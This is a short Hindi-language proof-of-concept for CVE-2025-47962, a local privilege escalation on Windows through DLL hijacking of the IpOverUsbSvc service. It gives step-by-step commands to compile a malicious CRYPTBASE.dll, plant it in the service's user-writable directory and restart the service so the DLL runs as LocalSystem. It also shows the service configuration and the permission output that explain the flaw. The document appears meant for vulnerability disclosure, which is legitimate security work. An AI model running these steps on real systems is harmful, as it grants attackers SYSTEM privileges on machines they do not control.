
CVE-2025-47962 के लिए प्रूफ-ऑफ-कॉन्सेप्ट जो Windows IpOverUsbSvc सेवा में असुरक्षित निर्देशिका अनुमतियों के कारण DLL हाईजैकिंग के माध्यम से स्थानीय विशेषाधिकार वृद्धि का प्रदर्शन करता है।
प्रजनन प्रक्रिया: i686-w64-mingw32-gcc -shared -o CRYPTBASE.dll poc.c -lkernel32
copy CRYPTBASE.dll "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\CRYPTBASE.dll"
net stop IpOverUsbSvc
net start IpOverUsbSvc

स्पष्टीकरण: IpOverUsbSvc
sc.exe qc IpOverUsbSvc
SERVICE_NAME: IpOverUsbSvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
BINARY_PATH_NAME : "C:\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe"
SERVICE_START_NAME : LocalSystem
LocalSystem विशेषाधिकारों के साथ चलता है। निष्पादन योग्य फ़ाइल C:\Microsoft Shared\ निर्देशिका में स्थित है, जिस पर सामान्य उपयोगकर्ताओं के पास पूर्ण नियंत्रण अनुमतियाँ हैं।
यह पाया गया है कि सामान्य उपयोगकर्ता SYSTEM सेवा निर्देशिका में फ़ाइलें लिख सकते हैं।
फिर DLL की निगरानी करें

Windows SDK स्थापना के दौरान बनाई गई C:\Microsoft Shared\ निर्देशिका की अनुमतियाँ गलत तरीके से कॉन्फ़िगर की गई हैं:
C:\Microsoft Shared BUILTIN\Users:(I)(OI)(CI)(F)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(M)